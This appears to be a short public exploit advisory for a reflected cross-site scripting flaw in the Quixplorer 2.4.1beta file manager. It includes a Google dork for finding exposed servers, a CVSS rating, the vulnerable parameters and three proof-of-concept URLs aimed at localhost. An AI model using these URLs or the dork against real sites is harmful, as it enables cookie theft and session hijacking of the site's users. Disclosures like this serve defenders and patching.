# Exploit Title: Reflected XSS in quixplorer-2.4.1beta # Google Dork: intitle:"My Download Server" # Date: 04/24/2018 # Exploit Author: Adriano Marcio Monteiro (@adrianomarcmont) # Exploit Author Site: https://www.brztec.com # Exploit Author E-mail: adriano@brztec.com # Vendor Homepage: http://quixplorer.sourceforge.net/ # Software Link: https://sourceforge.net/projects/quixplorer/files/unstable/2.4.1%20beta/quixplorer-2.4.1beta.zip/download # Version: 2.4.1beta # Tested on: All # CVE : None # CVSS Score: 4.7 Medium # CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N # CVSS Link: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N Quixplorer-2.4.1beta is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Parameters order, srt and arbitrarily supplied URL parameter are vulnerables. PoC - Proof of Concept http://localhost/quixplorer-2.4.1beta/index.php/r1e9f"> http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=bszop">&srt=yes&lang=ptbr&do_action=&first=y&toggleAllC=on http://localhost/quixplorer-2.4.1beta/index.php?action=post&order=name&srt=w1ixb">&lang=ptbr&do_action=&first=y&toggleAllC=on